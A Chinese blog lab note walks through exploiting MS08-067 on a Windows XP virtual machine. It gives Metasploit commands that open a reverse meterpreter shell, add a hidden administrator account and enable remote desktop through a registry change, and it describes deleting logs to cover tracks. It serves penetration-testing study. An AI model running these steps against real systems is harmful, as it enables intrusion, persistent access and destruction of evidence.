内网渗透笔记(二):MS08-067漏洞利用

最新推荐文章于 2023-12-19 16:37:28 发布
最新推荐文章于 2023-12-19 16:37:28 发布
阅读量1.8k 收藏 9
点赞数 1
分类专栏: 安全 文章标签: 渗透 安全 metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hg666hh/article/details/89785878
版权

前言:
漏洞介绍:如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。(出自百度百科)
实验环境:虚拟机
攻击者操作系统:Kali Linux 2019.1
靶机操作系统:Window Xp SP2

一、扫描

  • 使用Nnessus扫描靶机后发现存在MS08-067漏洞:

在这里插入图片描述

二、利用

  • 使用命令:msfdb init初始化msf框架:

在这里插入图片描述

  • 启动数据库:service postgresql start
  • 使用命令:msfconsole,进入metasploit:

在这里插入图片描述

  • 查找漏洞脚本:search ms08-067

在这里插入图片描述

  • 使用漏洞脚本:use exploit/windows/smb/ms08_067_netapi

在这里插入图片描述

  • 设置攻击载荷:set payload windows/meterpreter/reverse_tcp

在这里插入图片描述

  • 查看攻击所需的配置选项:show options

在这里插入图片描述

  • 设置靶机IP:set RHOSTS 192.168.188.123
  • 设置攻击者IP:set LHOST 192.168.188.121

在这里插入图片描述

  • 查看靶机系统类型:show targets

在这里插入图片描述

  • 设置靶机系统类型:set target 10

在这里插入图片描述

  • 攻击: exploit

在这里插入图片描述

三、提权

  • shell

在这里插入图片描述

  • 创建用户:net user test 123 /add

在这里插入图片描述

  • 提权:net localgroup administrators test /add

在这里插入图片描述

  • 删除原来的用户组:net localgroup users test /del

在这里插入图片描述

  • 查看用户: net user test

在这里插入图片描述

四、入侵

  • 在运行中打开:mstsc,远程连接靶机:
    在这里插入图片描述
  • 使用刚刚创建好的用户登录:

在这里插入图片描述

  • 登录成功:

在这里插入图片描述

五、退隐

  • 删除用户

在这里插入图片描述

  • 删除日志:

在这里插入图片描述

溜了,溜了!

PS:若靶机关闭的远程服务则需在shell中执行以下命令:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f

在这里插入图片描述

hg666hh
关注
专栏目录
渗透测试基础(四) MS08-067 漏洞攻击
Venus_majian
06-20 672
1. 漏洞介绍 2. 环境搭建 3. 渗透测试 4. 主机利用
[系统安全] 十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及蠕虫解析
杨秀璋的专栏
03-01 8605
作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
ms08-067利用工具
09-23
很好的ms08067利用工具 cmd下运行ms08067.exe 然后telnet ip 4444端口 很好的ms08067利用工具 cmd下运行ms08067.exe 然后telnet ip 4444端口
MS08-067漏洞利用提权
小赵同学的博客
03-04 834
漏洞介绍:如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 实验环境: Kali : 192.168.228.128 Win sever 2003 : 192.168.228.131 复现步骤 使用Nnessus扫描靶机后发现存在MS08-067漏洞 或者使用Nmap扫描确认存在漏洞,nmap -n
MS08067利用方法
weixin_40789841的博客
01-21 1200
一、实验目的及要求 1. 掌握利用MS08067远程溢出工具发送特殊构造的数据包,使目标主机产生溢出,然后执行shellcode代码,,打开目标主机端口,使用telnet连接目标端口,获得系统权限。 、实验设备(环境)及要求 PC机, VC++等,虚拟云平台 三、实验内容与步骤 1.进入”c:\tools\MS08067利用方法”的目录 ...
利用MS08067漏洞扫描445断口主机入侵(工具)
05-17
利用MS08067漏洞扫描445断口主机入侵(工具)
MS08-067的稳定利用方法
LittleWallE的专栏
01-14 4869
MS08-067已经出来三个月了,大部分服务器已经打上了补丁,看来利用价值不大。但是做为一个学习的材料还是挺好的。这个漏洞的原理在很多文章中都解释的非常详细了,但是关于漏洞利用的文章却比较少(可能是我没找到),我自己摸索了一整子,参考了不少高手们写的exploit,终于摸索出一个还算稳定的利用方法,将摸索的过程整理成本文。如果您发现有什么不足之处,或者有更好的方法,请联系我: Li
[网络安全自学篇] 六十八.WannaCry勒索病毒复现及分析()MS17-010利用及病毒解析
热门推荐
杨秀璋的专栏
04-20 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了通过Python利用永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
内网安全之:Kerberos 域用户提权漏洞(MS14-068;CVE-2014-6324)
f_carey的博客
12-08 1837
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Kerberos 域用户提权漏洞(MS14-068;CVE-2014-63241 pyKEK 工具包2 MSF 中 ms14_068 利用3 goldenPac.py4 防范 Kerberos MS14-068 漏洞 Microsoft Security Bulletin MS14-068 - Critical.
红日安全内网渗透笔记
VB551的博客
04-10 4703
靶场下载地址:漏洞详情 环境配置参考:【红日安全-VulnStack】ATT&CK实战系列——红队实战() - yokan - 博客园 此实战仅有3台机器 DMZ区的WEB机 、核心区的AD机、办公区的PC 第一步:信息收集 已知WEB机的IP地址,用syn包进行扫描。 nmap -sS -v 192.168.111.80 获得端口开放 ...
《内网安全攻防:渗透测试实战指南》读书笔记(七):跨域攻击分析及防御
闵行小鱼塘
04-19 2864
本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,本章是跨域攻击分析及防御,对利用域信任关系实现跨域攻击的典型方法进行了分析,并对如何部署安全的内网生产环境给出了建议,内容非常简短
MS08-067漏洞简谈与利用
qq_39120795的博客
11-11 4375
MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。 说明:微软安全公告KB958644 漏洞影响:服务器服务中的漏洞可能允许远程执行代码 发布日期:2008/10/22 下载大小:因操作系统而异。 受影响的操作系统:Windows 2000;XP;Server 2003;Vi.
利用ms08-067漏洞远程控制Windowsxp
xyx107的博客
03-03 1万+
1、查找ms08-067:2、使用:3、选择payload:(开始我用的windows/shell/...和windows/meterpreter/reverse_tpc有区别)4、查看options(yes为必填部分):5、输入RHOST(目标靶机)IP和LHOST的IP:6、查看适合的系统类型(简体中文sp3,编号34):7、可选target 0(自动)或自己选择:8、exploit(图中IP...
Ms08-067 漏洞利用
weixin_37104668的博客
03-02 3814
MS08-067漏洞原理: MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的,而NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中存在的逻辑错误,造成栈缓冲区可被溢...
ms08_067,ms10_046漏洞复现与利用
kunkun_xiaomeng的博客
09-07 1502
ms08_067,ms10_046
MS08-067病毒清理(含局域网)
weixin_34326558的博客
12-13 208
微软MS08-067(KB958644)漏洞病毒,在局域网传播迅速且非常难以清理干净,困扰许久,记录查杀清理过程如下:1、KB958644补丁必须打,最好安装所有补丁2、关闭windows计划任务服务3、瑞星MS08-067内存补丁,常驻内存保护4、金山 MS08-067专杀(含单机版和网络检测)5、金山工具可以清除病毒,但无法清楚活体,可用Kaspersky Net-Wor...
Metasploit利用MS08-067漏洞
test
11-20 9303
环境 攻击机器:ubuntu 18.04 被攻击机器:windows xp sp2 可能使用的工具 metasploit nessus nmap等 正文 首先搭建所需要的靶机环境和安装所有可能使用到的工具,接着使用类似nessus等工具扫描目标网段。以下是扫描结果,靶机的IP是192.168.1.166 发现这个没有打补丁的靶机存在很多的漏洞,本篇博文利用的是MS08-067.ms08_...
【Windows漏洞分析工具】wesng下载、命令选项、示例、使用方法
05-21 2761
【漏洞分析】补丁更新情况
6款漏扫工具来了!(附下载)
最新发布
小司机的奥拓
12-19 964
Acunetix Web Vulnerability Scanner(简称AWVS)是一款知名的网络漏洞扫描工具,它通过网络爬虫测试你的网站安全,检测流行安全漏洞,它的官方网站是:https://www.acunetix.com,我刚才看了一眼没有找到试用版下载链接,之前是有的,可以免费试用14天,当然你也可以去网上搜索破解版进行下载安装,有经济实力的朋友可以考虑购买正版软件,下图就是AWVS的主界面,里边还保存着我扫描过的两个站点,发现了4个高危漏洞,4个中危漏洞和20个低危漏洞。
授权渗透实践:利用MS14-68漏洞操控内网域控
文章主要探讨了如何在特定的内网环境中利用漏洞MS14068进行操作,其中涉及到的技术包括白盒攻击(即对目标系统有一定了解的情况下的攻击)和黑盒攻击(对目标系统知之甚少)。 首先,作者提到在一个未更新360防护的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值